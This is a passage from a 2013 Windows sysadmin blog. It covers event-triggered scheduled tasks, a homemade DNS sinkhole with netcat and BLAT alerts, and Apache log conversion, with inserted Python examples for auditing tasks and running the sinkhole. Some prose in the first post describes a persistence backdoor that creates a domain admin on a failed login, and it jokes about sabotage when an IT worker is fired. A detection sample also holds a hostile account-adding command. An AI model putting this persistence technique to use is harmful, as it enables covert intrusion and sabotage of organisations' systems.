UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<br />
<div class="MsoPlainText">
Account Name: smahoney</div>
<div class="MsoPlainText">
Full Name: Mahoney, Sausage</div>
<div class="MsoPlainText">
Client Address: ::ffff:192.168.0.56</div>
<div class="MsoPlainText">
Failure Code: 0x18</div>
<div class="MsoPlainText">
Reason Failed: Bad Username or Password</div>
<div class="MsoPlainText">
Logged From: dc1.fakedomain.local</div>
<div class="MsoPlainText">
Logged At: 2013-04-26T08:52:35.445</div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
That's about as good as I'm looking for. </div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
Now this setup isn't perfect: if you have multiple failed logins in rapid succession, things are going to get messy because the output files use static names. It takes about 2 seconds for the script to run, so as long as you don't have multiple failed attempts from different users within 2 seconds you're golden. You could tack a <span style="font-family: "Courier New",Courier,monospace;">%random%</span> variable onto the file name to eliminate that problem. I haven't tested it yet but I'm sure it'd work, and the odds that you're having enough failed logins to hit the same <span style="font-family: "Courier New",Courier,monospace;">%random%</span> variable output while the file exists are slim, and if that is happening, you've got much larger problems.</div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
There are lots and lots of interesting Event IDs that you can use this for, like when an account is created, deleted, or reaches the locked out state. Anything that registers an event in any of the event logs can be used to trigger this setup.</div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
Now, you can also use this as a post-exploit foothold. For example, find a service user account, one that no one has any reason to ever actually log in with, and set up a task so that when that particular account fails a login it creates a user and adds them to the remote desktop users, VPN users, and domain admins groups. Then intentionally fail a login via the OWA page, their ancient PPTP VPN, a Sharepoint page, that RDP port they didn't block, anywhere that you can try an AD login onto the domain, to trigger it. Thanks to Mark Baggett for pointing that one out here: <a href="https://isc.sans.edu/diary/Wipe+the+drive!++Stealthy+Malware+Persistence+-+Part+4/15460" target="_blank">Wipe the Drive Part 4</a></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
Or maybe you're just a vengeful IT type and want all hell to break loose when you're fired, and tie an account disabled / deleted task to your user account. </div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
I'm currently looking for a way to get user generated data into the event log somehow. If we can do that from some external source, and we had previous access to the server and created a task and some scripts to parse the event log info, we have the makings of a really slick backdoor.</div>
<br />
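Because any logged event can start a task, event-triggered tasks are worth auditing on servers you look after. The following is an added example, not part of the original post: it reads task definitions in the Task Scheduler XML schema and ranks tasks that fire on account-related Security events or whose action changes accounts or groups. The sample task names, the scripts they run and the event-ID list are constructed for the demonstration.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Security-log event IDs for the account activity the post mentions
# (failed logons, accounts created, disabled, deleted, locked out).
ACCOUNT_EVENTS = {
    4625: "failed logon",
    4771: "Kerberos pre-authentication failed",
    4720: "account created",
    4725: "account disabled",
    4726: "account deleted",
    4740: "account locked out",
}

# Action command lines that create accounts or change group membership.
ACCOUNT_CHANGE = re.compile(
    r"\bnet1?(\.exe)?\s+(user|group|localgroup)\b.*\s/add\b"
    r"|\b(New-ADUser|Add-ADGroupMember|New-LocalUser|Add-LocalGroupMember)\b"
    r"|\bdsadd(\.exe)?\b",
    re.IGNORECASE,
)


def audit_task(name, xml_text):
    """Return one finding per event trigger in a task definition."""
    root = ET.fromstring(xml_text)
    run_as = root.findtext("t:Principals/t:Principal/t:UserId", "", NS)
    commands = [
        (ex.findtext("t:Command", "", NS) + " "
         + ex.findtext("t:Arguments", "", NS)).strip()
        for ex in root.findall("t:Actions/t:Exec", NS)
    ]
    changes = any(ACCOUNT_CHANGE.search(c) for c in commands)
    findings = []
    for trig in root.findall("t:Triggers/t:EventTrigger", NS):
        # The subscription is an event-log query stored as escaped XML.
        sub = trig.findtext("t:Subscription", "", NS)
        ids = sorted({int(n) for n in re.findall(r"EventID\s*=\s*(\d+)", sub)})
        watched = [ACCOUNT_EVENTS[i] for i in ids if i in ACCOUNT_EVENTS]
        reasons = []
        if watched:
            reasons.append("fires on " + ", ".join(watched))
        if changes:
            reasons.append("action creates accounts or changes groups")
        findings.append({
            "task": name,
            "event_ids": ids,
            "logs": sorted(set(re.findall(r'Path="([^"]+)"', sub))),
            "run_as": run_as,
            "commands": commands,
            "severity": "high" if changes else "review" if watched else "info",
            "reasons": reasons,
        })
    return findings


def audit_all(tasks):
    """Audit a {name: xml} mapping, most serious findings first."""
    order = {"high": 0, "review": 1, "info": 2}
    found = [f for n, x in tasks.items() for f in audit_task(n, x)]
    return sorted(found, key=lambda f: (order[f["severity"]], f["task"]))


# ---- Constructed sample data (not taken from any real system) ----
def event_trigger(log, event_id):
    query = ('<QueryList><Query Id="0" Path="%s"><Select Path="%s">'
             "*[System[(EventID=%d)]]</Select></Query></QueryList>"
             % (log, log, event_id))
    return ("<EventTrigger><Enabled>true</Enabled><Subscription>"
            + escape(query) + "</Subscription></EventTrigger>")


def sample_task(trigger, command, arguments=""):
    return (
        '<Task version="1.2" xmlns="' + NS["t"] + '">'
        "<Triggers>" + trigger + "</Triggers>"
        '<Principals><Principal id="Author"><UserId>S-1-5-18</UserId>'
        "</Principal></Principals>"
        '<Actions Context="Author"><Exec><Command>' + escape(command)
        + "</Command><Arguments>" + escape(arguments)
        + "</Arguments></Exec></Actions></Task>"
    )


SAMPLE_TASKS = {
    "FailedLoginAlert": sample_task(event_trigger("Security", 4771),
                                    r"C:\Scripts\alert.cmd"),
    "UpdateHelper": sample_task(
        event_trigger("Security", 4771), "cmd.exe",
        '/c net localgroup "Remote Desktop Users" svc_tmp /add'),
    "ServiceWatch": sample_task(event_trigger("System", 7036),
                                r"C:\Scripts\svc.cmd"),
    "NightlyBackup": sample_task(
        "<TimeTrigger><StartBoundary>2013-04-26T02:00:00</StartBoundary>"
        "</TimeTrigger>", r"C:\Scripts\backup.cmd"),
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_TASKS):
        print(f["severity"], f["task"], f["event_ids"], "; ".join(f["reasons"]))
```
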
<br />
<br />
<br />Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-7776905799486744720.post-35503532111818757462013-04-02T08:45:00.000-10:002013-04-02T08:45:20.269-10:00<br />
Sinkholing, with reporting, using Windows DNS, Netcat, and BLAT on a Zero Dollar Budget<br />
<br />
So DNS sinkholes are a pretty good idea to run internally in a company. Doing it for free is better. If you like the idea of using this, don't want to pay for it, and you run Windows, this post is for you.<br />
<br />
<br />
Currently my solution only logs HTTP connections: it will still sinkhole all connections to the domains, but it will log and alert you to HTTP connections only.<br />
<br />
I'm sure there's a lot of different ways you can do this. I'm using Windows Server 2K8r2 with DNS already installed in this setup, my actual setup that I will be implementing will be running some flavor of *nix and BIND, it's just more flexible. I saw lots of things that use various *nix setups and BIND but nothing that really works with Windows (for free) so I decided to take the path less traveled.<br />
<br />
This PowerShell script I found from the SANS Institute does an AMAZING job of adding entries into Windows DNS. <a href="http://www.sans.org/windows-security/2010/08/31/windows-dns-server-blackhole-blacklist" target="_blank">Article with link to zip file with PowerShell script.</a> Read the whole article, it's worth it.<br />
<br />
So since we now have a PowerShell script that can manipulate DNS entries on our Windows DNS server, we need to decide if we're going to sinkhole just one domain or a list of domains. Since making a sinkhole and scripting stuff doesn't really make sense for just one entry, we'll need a list of bad domains.<br />
<br />
I'm getting my list from <a href="http://malware-domains.com/" target="_blank">Malware-Domains.com</a>, specifically the "Just Domains" list. I haven't vetted this list for accuracy, speed of update, false positives, or anything really. It just happened to be one of the more commonly mentioned lists I saw floating about the net. I strongly suggest you put some time in and do the research on what list to choose; it could mean the difference between a LOT of angry end users with little to no effective result, and a well functioning setup.<br />
<br />
Alright, we know where the list we want is, and we know what script we're going to use to create the sinkholes, including the switches we want (because you read the article, right?). Now let's stitch our server portion together:<br />
<br />
I've created a directory named C:\Sinkhole.<br />
Inside this directory I have my Sinkhole-DNS.ps1 script (from the link above, the one you read the whole way through) and this script:<br />
<br />
-=SCRIPT=-<br />
@echo off<br />
if exist C:\Sinkhole\justdomains.zip del /f /q C:\Sinkhole\justdomains.zip<br />
if exist C:\Sinkhole\justdomains.txt del /f /q C:\Sinkhole\justdomains.txt<br />
powershell.exe C:\sinkhole\Sinkhole-DNS.ps1 -DeleteSinkHoleDomains<br />
bitsadmin /transfer MalwareDomains /download /priority normal http://www.malware-domains.com/files/justdomains.zip C:\Sinkhole\justdomains.zip<br />
7zip e C:\sinkhole\justdomains.zip -oC:\sinkhole\<br />
ren C:\sinkhole\justdomains justdomains.txt<br />
del /f /q C:\sinkhole\justdomains.zip<br />
powershell.exe C:\sinkhole\Sinkhole-DNS.ps1 -InputFile "C:\sinkhole\justdomains.txt" -SinkholeIP "10.1.1.1" -IncludeWildCard<br />
del /f /q C:\sinkhole\justdomains.txt<br />
<br />
First two commands are "just in case" house cleaning. Those two files should get nuked at the end of the script, but just in case they don't we check for and remove them before we get started.<br />
<br />
Next we use powershell to run our Sinkhole-DNS script to remove all the DNS sinkholes that were created at the last run. It's not likely that a domain that was used to host malware got clean and is now being used for legitimate traffic, but I want it to remove all the old stuff first. Keep things clean. (this can take several actual minutes)<br />
<br />
Then we have a bitsadmin command to go out and grab the domains list from malware-domains.com and save it to C:\Sinkhole\<br />
<br />
Now we use the built in windows command line utility to extract the files from the zip archive ....<br />
Oh wait, no we can't, because there is no such beast. WHY MICROSOFT WHY!!!!<br />
So we use 7zip's command line application (<a href="http://www.7-zip.org/download.html" target="_blank">Download Site</a>); the Command Line Version runs on x32 and x64.<br />
*Please note I renamed the 7zip executable and placed it in a separate folder and added it to the path variable for ease of access now and in the future. You can place it directly in the C:\sinkhole folder or a folder that is in your path variable.<br />
<br />
Then we rename the file justdomains to justdomains.txt. Because since it's windows I want it to have the appropriate file extension, that's why.<br />
<br />
Delete the zip file as we don't need it any longer.<br />
<br />
Run our powershell script to add all the domains to DNS and point them to our listener and logging station, 10.1.1.1 in this example (this can take several actual minutes).<br />
<br />
Delete the txt file with the domain names.<br />
<br />
I suggest creating a scheduled task for this script.<br />
<br />
Whew<br />
<br />
Okay, so we now have a ton of new entries in our DNS server. It makes a mess, you can't find anything, and it's confusing. I would get a separate server from your main internal DNS servers and use this as a forwarder for them; that way you can still navigate your internal DNS stuff without having to look through a jungle. Plus, even though there are safeguards against the script deleting anything that's not in the sinkhole, it's always better to be safe than sorry.<br />
<br />
We've got through the whirlwind tour of setting up the DNS server. Now we need to set up our listener and reporting station.<br />
<br />
You should be able to use any recent version of windows you want for this. I happened to have an old XP machine sitting about collecting dust so I used that. I didn't test it on 7 or 8 or 2003 or 2008 or 2012, it should work without a problem as long as your AV doesn't go all nom nom nom on the netcat / ncat executable.<br />
<br />
Okay, so let's get our listener set up.<br />
<br />
I used netcat for Windows; I already had it and it did what I needed. I'm sure you could use ncat and achieve the same results, likely better results with more listening ports capturing more protocols. I've used ncat before but the version I used lacked the portability that I wanted for this. I hear tell that there's now a standalone version that doesn't require the library files to be bundled with it separately anymore. It has more advanced features and it's worth your time to check it out. <a href="http://nmap.org/ncat/" target="_blank">Ncat</a><br />
<br />
So netcat serves a dual purpose here.<br />
1. We can use netcat as a primitive web server by directing a file to it while it's listening.<br />
2. Netcat will log the HTTP request then we can send it to ourselves as an email and know what's going on.<br />
<br />
We'll also need something to send us an email with the information we've gathered from the listener.<br />
I like BLAT, so that's what I used; you can use something else if you want. <a href="http://www.blat.net/" target="_blank">BLAT</a><br />
<br />
This is the listener script I wrote to handle things:<br />
<br />
-=SCRIPT=-<br />
@echo off<br />
cls<br />
:beg<br />
echo A Connection has been made to the sinkhole: > temp.txt<br />
echo ------------------------------------------- >> temp.txt<br />
nc -l -vv -p 80 -w 2 -s 10.1.1.1< index.html >> temp.txt<br />
echo ------------------------------------------- >> temp.txt<br />
echo.<br />
echo %date% >> temp.txt<br />
echo %time% >> temp.txt<br />
for /f "tokens=3" %%a in ('netstat -ano ^| find /i "10.1.1.1:80" ^| find /i "time_wait"') do set host=%%a<br />
set host=%host::=#%<br />
for /f "tokens=1 delims=#" %%a in ("%host%") do set host=%%a<br />
for /f "tokens=2" %%a in ('nslookup %host% ^| find /i "Name:"') do set name=%%a<br />
echo From: %name% %host% >> temp.txt<br />
::set date<br />
set dt=%date:~4,2%.%date:~7,2%.%date:~10,4%<br />
::set time<br />
if %time:~0,2% LSS 10 set hr=%time:~1,1%<br />
if %time:~0,2% GEQ 10 set hr=%time:~0,2%<br />
if %time:~3,2% LSS 10 set mn=%time:~4,1%<br />
if %time:~3,2% GEQ 10 set mn=%time:~3,2%<br />
set tm=%hr%.%mn%<br />
::set name<br />
set name=%host%_%dt%-%tm%<br />
::rename file<br />
ren temp.txt %name%.txt<br />
::send the alert<br />
blat.exe %name%.txt -server 10.1.1.2 -subject "HTTP Sinkhole Alert- %host%" -to youremailhere@domain.com -mailfrom sinkhole@domain.com<br />
move %name%.txt old<br />
set name=<br />
set dt=<br />
set tm=<br />
goto beg<br />
<br />
Alright so I have this setup as a loop, you could probably use netcat's -L (listen harder) but I was having trouble running the rest of the commands reliably with any solution I could come up with using -L so I just make a big loop.<br />
<br />
I write out all the info I get from the listener, plus some other info, and formatting to temp.txt<br />
<br />
I start my netcat listener and pipe index.html to it. I do this so that, on the off chance a user tries to go to a sinkhole domain that's been unjustly listed as such, they know what's going on and to contact me. (index.html will be included below).<br />
-l is listen<br />
-vv is very verbose<br />
-w 2 is wait 2 seconds before closing the connection (timeout). You need this or else it will sit there with an open connection endlessly<br />
-s 10.1.1.1 says to bind and listen on this IP address only<br />
-p 80 is port 80<br />
&lt;index.html will shovel index.html to anything that connects to it<br />
>> temp.txt writes everything that netcat receives to the temp file<br />
<br />
Everything else is mostly formatting.<br />
echo %date% and %time% do just what you think they do, echo the date and time.<br />
<br />
The one thing that was missing, and I have no idea why: when netcat first gets a connection it lists who is connecting to what (10.1.1.45 connection to 10.1.1.1 port 80), but it does not output that to the log file.<br />
So this is the solution I came up with. It will work as long as only 1 connection happens at a time to the listener. It's not 100% reliable, since if multiple IPs hit the sinkhole at once things will get weird.<br />
<br />
for /f "tokens=3" %%a in ('netstat -ano ^| find /i "10.1.1.1:80" ^| find /i "time_wait"') do set host=%%a<br />
<br />
This does a netstat, finds the connection in time_wait (not established, as the -w 2 disconnects before this part gets run) to the listening server on port 80, parses out the IP and port that connected to it, and sets it to the variable %host%.<br />
Then with this<br />
set host=%host::=#%<br />
we change the ipaddress:port to ipaddress#port.<br />
We can't delimit a : on a for loop, but we can delimit a #, that way we can run a for loop and grab just the IP address that connected.<br />
for /f "tokens=1 delims=#" %%a in ("%host%") do set host=%%a<br />
Now %host% is just the IP address.<br />
Now we do another for loop with an nslookup to get the hostname, since the connection is internal we should be able to get the hostname from this:<br />
for /f "tokens=2" %%a in ('nslookup %host% ^| find /i "Name:"') do set name=%%a<br />
<br />
Next we do some date / time tomfoolery to timestamp our log file:<br />
::set date<br />set dt=%date:~4,2%.%date:~7,2%.%date:~10,4%<br />
*For my international readers: this part probably isn't going to work for you. Everyone does their date representation differently, and this variable is based on the American method of displaying the date, MM/DD/YYYY. You will need to adjust accordingly.<br />
<br />
::set time<br />if %time:~0,2% LSS 10 set hr=%time:~1,1%<br />if %time:~0,2% GEQ 10 set hr=%time:~0,2%<br />
if %time:~3,2% LSS 10 set mn=%time:~4,1%<br />if %time:~3,2% GEQ 10 set mn=%time:~3,2%<br />set tm=%hr%.%mn%<br />
Time gets a bit squirrely also. We have to have the less than and greater than statements to handle hours and minutes less than 10. For example, if it's 08:24.49 am and you try to set a variable to 08 it's going to just end up being " 8", and it's going to mess things up since there will be a space before the 8. Same thing for the minutes.<br />
<br />
Next big thing we have is the BLAT command.<br />
You'll need the BLAT executable and the blat.dll file in the folder with the script or in a folder that's in the PATH variable.<br />
blat.exe %name%.txt -server 10.1.1.2 -subject "HTTP Sinkhole Alert- %host%" -to youremailhere@domain.com -mailfrom sinkhole@domain.com<br />
<br />
%name%.txt is the temp.txt file renamed; its contents are used as the body of the email.<br />
The rest is self-explanatory; use blat -h to see the help file. You will either want to create an internal relay connector in Exchange to allow you to send the email or you can use authentication in BLAT.<br />
<br />
Then we move the now named file to the OLD directory as a log repository. That part is optional and actually you can cut out a bunch of the script if you don't want it, like the time and date tomfoolery.<br />
<br />
And that's that, we wait and see what connects to our listener.<br />
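The batch listener has two limits the post points out: the client address has to be scraped from netstat afterwards, and only one connection at a time is handled. The following is an added example, not code from the original post, of a listener that takes the client address from the accepted socket, handles connections in parallel, and gives every alert its own file name; it also strips control characters from logged fields so a client cannot inject lines into the alert. The function names and the alert layout are assumptions, and sending the mail (the BLAT step) is left to the `deliver` hook.

```python
import socket
import socketserver
import threading
import time

INDEX_HTML = b"<html><body><h1>Welcome to the IT Sinkhole</h1></body></html>"
MAX_REQUEST = 8192  # stop reading after this many bytes


def clean(value, limit=256):
    """Keep printable ASCII only, so a client cannot inject lines into alerts."""
    return "".join(c if 32 <= ord(c) < 127 else "?" for c in value)[:limit]


def parse_request(client_ip, raw, now=None):
    """Turn the raw bytes a client sent into one alert record."""
    head = raw.decode("latin-1").split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method, uri = (parts[0], parts[1]) if len(parts) >= 2 else ("", "")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), value.strip())
    return {
        "time": now or time.strftime("%Y-%m-%dT%H:%M:%S"),
        "client": client_ip,
        "method": clean(method, 16),
        "uri": clean(uri, 1024),
        "host": clean(headers.get("host", "")),
        "user_agent": clean(headers.get("user-agent", "")),
    }


def record_name(record, seq):
    """Unique, Windows-safe file name: client, timestamp and a sequence number."""
    stamp = record["time"].replace(":", ".")
    return "%s_%s_%04d.txt" % (record["client"].replace(":", "-"), stamp, seq)


def format_alert(record):
    return "\r\n".join([
        "A Connection has been made to the sinkhole:",
        "-" * 43,
        "%s %s" % (record["method"], record["uri"]),
        "Host: %s" % record["host"],
        "User-Agent: %s" % record["user_agent"],
        "-" * 43,
        "Time: %s" % record["time"],
        "From: %s" % record["client"],
    ])


class SinkholeHandler(socketserver.BaseRequestHandler):
    def handle(self):
        self.request.settimeout(2.0)  # same idea as nc -w 2
        data = b""
        try:
            while b"\r\n\r\n" not in data and len(data) < MAX_REQUEST:
                chunk = self.request.recv(1024)
                if not chunk:
                    break
                data += chunk
        except socket.timeout:
            pass  # log whatever arrived before the timeout
        # The peer address comes from the accepted socket, not from netstat.
        record = parse_request(self.client_address[0], data)
        with self.server.lock:
            self.server.seq += 1
            name = record_name(record, self.server.seq)
            self.server.records.append((name, record))
        self.server.deliver(name, format_alert(record))
        try:
            self.request.sendall(
                b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n"
                b"Content-Length: %d\r\nConnection: close\r\n\r\n"
                % len(INDEX_HTML) + INDEX_HTML)
        except OSError:
            pass  # client went away; the alert is already recorded


class SinkholeServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, address, deliver=None):
        super().__init__(address, SinkholeHandler)
        self.records, self.seq = [], 0
        self.lock = threading.Lock()
        # Hook for mailing or saving the alert; the default just prints it.
        self.deliver = deliver or (lambda name, body: print(name, body, sep="\n"))


if __name__ == "__main__":
    # 10.1.1.1 port 80 is the listener address used in the post.
    with SinkholeServer(("10.1.1.1", 80)) as server:
        server.serve_forever()
```
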
<br />
Here's some action shots:<br />
<br />
I've set up a wildcard sinkhole for blakhal0.com (not an actual domain as far as I know) on the DNS server.<br />
<br />
Here we see the wildcard matching in action:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0GnXEw9v6s3DbhTWRl6McR16fFJBqCN_qxEtNUBJZUWK24rksF0jmVJNh4FcuAijwxRz2EFvNpw6BciU9QlaN-Y31fQGqTyXIEMvjKF6S1kWwz6P4x4Any0r8tODu6YGR0jrUar9jWAk/s1600/DNSBlakholesetup.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0GnXEw9v6s3DbhTWRl6McR16fFJBqCN_qxEtNUBJZUWK24rksF0jmVJNh4FcuAijwxRz2EFvNpw6BciU9QlaN-Y31fQGqTyXIEMvjKF6S1kWwz6P4x4Any0r8tODu6YGR0jrUar9jWAk/s640/DNSBlakholesetup.bmp" width="640" /></a></div>
<br />
Here's a shot of the webpage the clients will get if they open a bad site in their browser (this is probably not going to happen often as most malware doesn't do things visibly in the browser)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWkocO1V9cE4IoimU6I_zQ1j6gzLAjgYY3eRiIyL3NgWkhZI_m-3w1X4wC4GWOLnJM6_WO-lQ6nYLeuaQqB90GTmvTGraplHV1o6S9YteA9xVsVI7X6h0TR6hWeEknW_ocxif3oWOdZjw/s1600/index.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWkocO1V9cE4IoimU6I_zQ1j6gzLAjgYY3eRiIyL3NgWkhZI_m-3w1X4wC4GWOLnJM6_WO-lQ6nYLeuaQqB90GTmvTGraplHV1o6S9YteA9xVsVI7X6h0TR6hWeEknW_ocxif3oWOdZjw/s640/index.bmp" width="640" /></a></div>
<br />
And here is the email alert you get when something has connected to the sinkhole <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZGRQTBwumAfGQujUr0LR6JKwh5uwzTAjp3_X0oSeCh1uku_LdkjzOQ-BQWJ91_PahLk5iQ8lwnGE5M35FOYDI-MrV7gJpuVPZaqycPozbpjLTZ9d0hEI5elLJyh8FRWrlXlyRtRaQW3o/s1600/email.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="434" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZGRQTBwumAfGQujUr0LR6JKwh5uwzTAjp3_X0oSeCh1uku_LdkjzOQ-BQWJ91_PahLk5iQ8lwnGE5M35FOYDI-MrV7gJpuVPZaqycPozbpjLTZ9d0hEI5elLJyh8FRWrlXlyRtRaQW3o/s640/email.bmp" width="640" /></a></div>
<br />
I like it because you get the host they attempted to connect to (Host:virus.blakhal0.com), what URI they tried to go to (in this instance nothing), the date, the time, and what host the connection initiated from.<br />
It will work for any URI on any domain you have sinkholed, so if they try and get /whatever/%20%20/evil.exe it'll log it. Then if you're feeling adventurous you can go get the exe and start examining it to see what would have happened, after you've put the kibosh on whatever is trying to connect in the first place.<br />
<br />
From the 3 minutes I've spent looking at it it looks like you can use ncat for ssl connections so there's that to look forward to.<br />
<br />
So for zero dollars you can have a reporting sinkhole for HTTP setup with Windows DNS. Enjoy.<br />
<br />
<br />
+Index.html<br />
<html><br /><body bgcolor="red"><br /><h1>Welcome to the IT Sinkhole</h1><br />You've arrived here because the domain you are attempting to reach is currently listed as hosting malware.<br /><br><br />An alert has been sent to the IT department. <br /><br><br />Please send any additional information about how you got here to the IT department (it@domain.com)<br /><br><br />Click here to send an email:<a href="mailto:it@domain.com?Subject=Sinkhole">Email IT</a><br /></body><br /></html><br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7776905799486744720.post-66745326292451335082013-02-22T07:48:00.000-10:002013-02-22T07:48:18.953-10:00<br />
Convert Apache Log Format to W3C format<br />
<br />
A friend of mine came to me with a problem. He needs to convert his apache log format log files to W3C so that he can send them in to make sure royalties are getting collected properly.<br />
<br />
Now why they demand the files in W3C format, I don't know.<br />
<br />
After looking for, and not finding, a pre-made solution it was time to knuckle down and script that mother out.<br />
<br />
Here's a sample of one line from the apache log:<br />
<br />
127.0.0.1 - - [07/Feb/2013:00:00:16 -0600] "GET /admin.cgi ICY/1.0" 200 155 "-" "ShoutcastDSP (Mozilla Compatible)" 0<br />
<br />
Here's what the W3C format of that log looks like:<br />
<br />
127.0.0.1 127.0.01 02/07/2012 13:00:00 /admin.cgi 200 ShoutcastDSP (Mozilla Compatible) 155 0<br />
<br />
So we've got some cutting, splicing, and re-ordering to get done:<br />
<br />
<br />-=Script=-<br />
<br />
@echo off<br />
setlocal enabledelayedexpansion<br />
for /f "tokens=1,2,3,4,5,6,7,8,9,10,11,*" %%a in (Apache_LogFile_Format.txt) do (<br />
<br />
rem set date<br />
set datetime=%%d<br />
for /f "tokens=1" %%z in ("!datetime!") do set d=!datetime:~1,2!<br />
rem the trailing space on the next line ends up in m, so the comparisons below include it<br />
for /f "tokens=1" %%z in ("!datetime!") do set m=!datetime:~4,3! <br />
for /f "tokens=1" %%z in ("!datetime!") do set y=!datetime:~8,4!<br />
if "!m!"=="Jan " set mn=01<br />
if "!m!"=="Feb " set mn=02<br />
if "!m!"=="Mar " set mn=03<br />
if "!m!"=="Apr " set mn=04<br />
if "!m!"=="May " set mn=05<br />
if "!m!"=="Jun " set mn=06<br />
if "!m!"=="Jul " set mn=07<br />
if "!m!"=="Aug " set mn=08<br />
if "!m!"=="Sep " set mn=09<br />
if "!m!"=="Oct " set mn=10<br />
if "!m!"=="Nov " set mn=11<br />
if "!m!"=="Dec " set mn=12<br />
<br />
rem set time<br />
for /f "tokens=1 delims=[" %%z in ("!datetime!") do set hh=!datetime:~13,2!<br />
for /f "tokens=1 delims=[" %%z in ("!datetime!") do set mm=!datetime:~16,2!<br />
for /f "tokens=1 delims=[" %%z in ("!datetime!") do set ss=!datetime:~19,2!<br />
<br />
<br />
rem replace " with #<br />
for /f "tokens=* usebackq" %%w in ('%%l') do (<br />
set tk=%%w<br />
set tk=!tk:"=#!<br />
)<br />
<br />
rem parse out the user-agent from the duration<br />
for /f "tokens=1 delims=#" %%x in ("!tk!") do set ua=%%x<br />
for /f "tokens=2 delims=#" %%y in ("!tk!") do set dur=%%y<br />
<br />
echo %%a %%a !mn!/!d!/!y! !hh!:!mm!:!ss! %%g %%i !ua! %%j !dur! >> output.txt<br />
)<br />
<br />
-= End Script=-<br />
Everything is pretty straight forward until we have to parse out the useragent and duration:<br />
"ShoutcastDSP (Mozilla Compatible)" 0<br />
<br />
The user agent string can be just about anything really, varied length, so we can't delimit on the spaces or the parenthesis, it sure would be nice to delimit on the double quotes but you can't do that.<br />
So I picked up a new trick, using set to replace specific characters in a variable.<br />
So we use this: set tk=!tk:"=#! The important part is "=#, that's where we change the " to #. We can use # as a delimiter, so suddenly splitting the user agent and duration just got easy.<br />
Instead of this:<br />
<br />
"ShoutcastDSP (Mozilla Compatible)" 0<br />
we end up with this:<br />
#ShoutcastDSP (Mozilla Compatible)# 0 <br />
<br />
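The user agent is the one field in the log line that the client controls, so a converter has to cope with whatever it contains, including a # (which the replace-then-split trick would cut short) or an escaped quote. The following is an added example, not the script from this post, that parses each line with a regular expression and writes the fields in the same order as the script's echo line; the second and third sample lines are constructed, and the function names are assumptions.

```python
import re

# Apache "combined" format with a trailing duration field, as in the sample.
# A quoted field may contain \" (Apache escapes a literal quote that way).
LINE = re.compile(
    r'(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"'
    r'(?: (?P<duration>\S+))?\s*$'
)
TIME = re.compile(r'(\d{2})/([A-Za-z]{3})/(\d{4}):(\d{2}):(\d{2}):(\d{2})')
MONTHS = {name: "%02d" % num for num, name in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}


def convert_line(line):
    """Return the converted line, or None when the input does not parse."""
    m = LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    t = TIME.match(m.group("time"))
    if not t or t.group(2) not in MONTHS:
        return None
    day, mon, year, hh, mm, ss = t.groups()
    # Request line is "METHOD URI PROTOCOL"; keep "-" when it is malformed.
    parts = m.group("request").split(" ")
    uri = parts[1] if len(parts) >= 2 else "-"
    agent = m.group("agent").replace('\\"', '"')
    return " ".join([
        m.group("ip"), m.group("ip"),
        "%s/%s/%s" % (MONTHS[mon], day, year),
        "%s:%s:%s" % (hh, mm, ss),
        uri, m.group("status"), agent,
        m.group("bytes"), m.group("duration") or "-",
    ])


def convert_lines(lines):
    """Convert every line; return (converted, rejected 1-based line numbers)."""
    converted, rejected = [], []
    for number, line in enumerate(lines, 1):
        out = convert_line(line)
        if out is None:
            rejected.append(number)
        else:
            converted.append(out)
    return converted, rejected


SAMPLE_LINES = [
    # The sample line from the post.
    '127.0.0.1 - - [07/Feb/2013:00:00:16 -0600] "GET /admin.cgi ICY/1.0" '
    '200 155 "-" "ShoutcastDSP (Mozilla Compatible)" 0',
    # Constructed: user agent with a '#' and an escaped quote, no byte count.
    r'10.0.0.7 - - [07/Feb/2013:23:59:59 -0600] "GET /stream HTTP/1.0" '
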